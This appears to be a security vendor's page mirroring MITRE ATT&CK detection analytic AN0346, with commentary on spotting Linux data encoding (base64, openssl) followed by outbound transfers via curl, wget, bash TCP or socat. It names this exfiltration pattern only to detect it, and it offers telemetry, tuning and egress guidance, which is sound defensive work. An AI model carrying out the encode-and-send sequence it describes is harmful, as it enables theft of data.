AN0346: Analytic 0346
Shell/utility (base64, xxd -p, od, openssl enc -base64, python/perl base64 libraries) encodes data → subsequent outbound connections (curl/wget/bash TCP, socat, python requests) with high asymmetry or Base64/MIME blobs in HTTP/DNS payloads.
Analyst context for executives and security teams
This analytic matters because it focuses on a common data-handling pattern on Linux systems: local encoding of data followed by outbound network activity that may carry encoded blobs. For leaders, the value is not in the specific utilities alone, but in validating whether the organization can connect host activity to network egress evidence quickly enough to support incident decisions involving possible data movement or suspicious command-line automation.
Executive priority
Prioritize this as a coverage-validation item for Linux server and workload monitoring, especially where outbound internet access is allowed. Security leaders should ask whether SOC and IR teams can correlate command execution with HTTP or DNS egress, whether egress logging is retained long enough for investigations, and whether exceptions for administrative automation are documented as audit evidence. The supplied ATT&CK object does not specify impact, attribution, or active exploitation, so the business decision is about readiness and visibility rather than confirmed threat prevalence.
Technical view
For SOC and detection teams, validate whether Linux telemetry can show use of shell or utility-based encoding tools such as base64, xxd -p, od, openssl enc -base64, or Python/Perl base64 libraries, and whether those events can be correlated with subsequent outbound connections from tools or runtimes such as curl, wget, bash TCP, socat, or python requests. Since the official detection field is not provided and no tactics are specified, treat AN0346 as an analytic concept requiring local implementation, tuning, and baselining rather than a complete detection rule.
Likely telemetry
- Linux process execution telemetry with command-line arguments
- Parent-child process relationships for shells, scripting runtimes, and network utilities
- Outbound network connection metadata from Linux hosts
- HTTP request metadata or payload indicators where legally and technically available
- DNS query and response logs, including unusually long or encoded-looking labels where available
Detection direction
- Correlate encoding-related process activity with outbound connections occurring shortly afterward from the same host or process lineage.
- Look for high asymmetry in outbound traffic or Base64/MIME-like blobs in HTTP or DNS payloads, while accounting for legitimate software packaging, backup, monitoring, CI/CD, and administrative scripts.
- Tune around known-good automation that uses base64, openssl, curl, wget, Python, or Perl, because these utilities are common on Linux and can create false positives when viewed in isolation.
- Validate that telemetry preserves command-line detail and process lineage; without it, this analytic may degrade into weak network-only pattern matching.
- Confirm whether DNS and HTTP inspection are available and appropriate in the environment; encrypted traffic, privacy controls, or limited payload logging may create blind spots.
Mitigation priorities
- Start by restricting unnecessary outbound access from Linux servers and workloads through egress controls and approved proxies.
- Harden and monitor administrative scripting paths so legitimate use of encoding and network utilities is documented and distinguishable from unusual behavior.
- Ensure endpoint logging, network egress logging, and retention policies support correlation during incident response.
- Apply least privilege and workload segmentation so a compromised Linux host has limited ability to stage or transmit data externally.
- Use baselining and change control to reduce alert noise from expected automation before escalating this analytic into high-severity SOC workflows.
Analyst notes and limits
AN0346 is a MITRE detection analytic for Linux describing a sequence of local encoding activity followed by outbound connections or encoded-looking HTTP/DNS content. No ATT&CK relationships, tactics, or official detection implementation were supplied, so the strongest use is as a defensive engineering prompt: test whether host and network telemetry can be joined into an investigation-ready signal.
This take uses only the supplied ATT&CK fields. It does not establish active exploitation, adversary attribution, affected software, impact, or guaranteed detection. Local baselines, logging architecture, legal constraints on payload inspection, and approved administrative workflows are required to determine alert quality and operational priority.
Analytic 0346
Shell/utility (base64, xxd -p, od, openssl enc -base64, python/perl base64 libraries) encodes data → subsequent outbound connections (curl/wget/bash TCP, socat, python requests) with high asymmetry or Base64/MIME blobs in HTTP/DNS payloads.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | a5e90820e267… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
mitre-attack AN0346Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.